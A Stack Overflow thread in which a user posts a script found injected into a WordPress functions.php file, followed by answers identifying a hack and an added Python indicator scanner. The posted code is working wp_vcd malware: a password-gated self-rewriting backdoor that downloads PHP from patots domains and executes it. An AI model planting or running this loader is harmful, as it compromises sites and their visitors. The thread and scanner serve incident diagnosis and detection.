WordPress functions.php - Strange script

Content sourced from Stack Overflow; translated and used under the CC BY-SA 3.0 license


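Currently, while I am working on a WordPress site, I have the following code that is automatically added to the top of the functions.php file. This is happening locally on my laptop.

Please advise. This is the script: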

<?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '803ee29202dba58355290373a7e208fa'))
        {
    $div_code_name="wp_vcd";
            switch ($_REQUEST['action'])
                {






                    case 'change_domain';
                        if (isset($_REQUEST['newdomain']))
                            {

                                if (!empty($_REQUEST['newdomain']))
                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                {
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                 {

                                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                           @file_put_contents(__FILE__, $file);
                                                                   print "true";
                                                                                                                 }


                                                                                }
                                    }
                            }
                    break;

                                    case 'change_code';
                        if (isset($_REQUEST['newcode']))
                            {

                                if (!empty($_REQUEST['newcode']))
                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                {
                                                                                                     if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                                 {

                                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                           @file_put_contents(__FILE__, $file);
                                                                   print "true";
                                                                                                                 }


                                                                                }
                                    }
                            }
                    break;

                    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
                }

            die("");
        }








    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }

            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
               if( fwrite($handle, "<?php\n" . $phpCode))
               {
               }
                else
                {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                }
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }


    $wp_auth_key='74278a0b1580c2851b6ef39c8f1560a5';
            if (($tmpcontent = @file_get_contents("http://www.patots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.patots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }

                }
            }


            elseif ($tmpcontent = @file_get_contents("http://www.patots.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }

                }
            } 

                    elseif ($tmpcontent = @file_get_contents("http://www.patots.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }

                }
            }
            elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));

            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 

            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 

            } 





        }
    }

    //$start_wp_theme_tmp



    //wp_tmp


    //$end_wp_theme_tmp
    ?>
User answer:

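Your site has been hacked.

It loads malicious content from http://www.patots.pw/code.php. It also appears to be trying to set a master password to bypass normal authentication.

I suggest you delete all of the files to make sure the threat is gone.

This probably came from trying to install:

A) A "free" plugin from an obscure source.

B) A "free" theme from an obscure source.

For more information, see here and here.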

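User answer:

As ProEvilz said, your site has been hacked. Perhaps your server has been attacked as well. You can also try installing a WordPress security plugin such as Wordfence and running a scan.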
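
For checking every theme and plugin on a host for the same injection, the following scanner is an added example, not part of the original question or answers. Its patterns are taken from the script posted in the question; the function names, indicator labels and the sample tree are assumptions made for illustration. The remote host is matched by shape rather than by name because the script's `change_domain` action can rewrite it.

```python
import re
import tempfile
from pathlib import Path

# Patterns from the posted script; the host is matched by shape, not by name.
INDICATORS = {
    "wp_vcd_marker": re.compile(r"""\$div_code_name\s*=\s*["']wp_vcd["']"""),
    "temp_include_loader": re.compile(r"\btheme_temp_setup\s*\("),
    "remote_code_php": re.compile(r"""file_get_contents(?:_tcurl)?\(\s*["']https?://[^"'/]+/code\.php"""),
    "request_password_gate": re.compile(r"""\$_REQUEST\[['"]password['"]\]\s*==\s*['"][0-9a-f]{32}['"]"""),
    "rewrite_markers": re.compile(r"//\$start_wp_theme_tmp[\s\S]*?//\$end_wp_theme_tmp"),
}
DROPPED_NAMES = {"wp-tmp.php"}  # cached copy the script writes to disk
# Constructed, inert sample tree: marker lines only, no payload.
SAMPLE_TREE = {
    "themes/bad/functions.php": '<?php\n$div_code_name="wp_vcd";\n//$start_wp_theme_tmp\n//wp_tmp\n//$end_wp_theme_tmp\n',
    "themes/good/functions.php": "<?php\nadd_action('after_setup_theme', 'example_setup');\n",
    "wp-includes/wp-tmp.php": "<?php // constructed placeholder\n",
}


def scan_text(text):
    """Return sorted names of the indicators present in one PHP source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root):
    """Walk a WordPress tree and map relative path -> list of findings."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if path.name in DROPPED_NAMES:
            hits.append("dropped_file_name")
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def demo():
    """Write the constructed sample tree to a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_TREE.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root)


if __name__ == "__main__":
    print(demo())
```

Point `scan_tree` at the WordPress root of an offline copy of the site; any file it reports should be compared against a known-good copy of that theme, plugin or core release.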
